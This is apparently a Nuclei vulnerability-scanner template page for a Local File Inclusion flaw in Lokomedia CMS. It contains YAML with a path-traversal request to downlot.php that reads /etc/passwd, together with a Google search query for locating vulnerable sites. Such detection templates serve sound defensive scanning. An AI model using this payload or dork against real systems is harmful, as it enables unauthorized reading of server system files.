Lokomedia CMS - LFI Vulnerability
ID: lokomedia-cms-lfi
Severity: high
Author: r3Y3r53
Tags: lfi,lokomedia,cms
Description
Section titled “Description”A Local File Inclusion (LFI) vulnerability is a type of security vulnerability that occurs when a web application allows an attacker to include files on the server that should not be accessible.
YAML Source
Section titled “YAML Source”id: lokomedia-cms-lfi
info: name: Lokomedia CMS - LFI Vulnerability author: r3Y3r53 severity: high description: A Local File Inclusion (LFI) vulnerability is a type of security vulnerability that occurs when a web application allows an attacker to include files on the server that should not be accessible. reference: - https://cxsecurity.com/issue/WLB-2018070116 - https://github.com/kangkuswae/CMS-Lokomedia metadata: verified: true max-request: 1 google-query: inurl:/semua-download.html tags: lfi,lokomedia,cms
http: - method: GET path: - "{{BaseURL}}/downlot.php?file=../../../../../../../../../../etc/passwd"
matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:"
- type: word part: header words: - "application/proses"
- type: status status: - 200# digest: 4b0a00483046022100d02629676bce7ff03bcf6a3aa6c4ebd38e5b8e50598c2879873e80e91836b046022100a98dd1ed69250ddf3d15e35b369f0477806fe10606a1ea9f58189ed9b452f76d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/lokomedia-cms-lfi.yaml"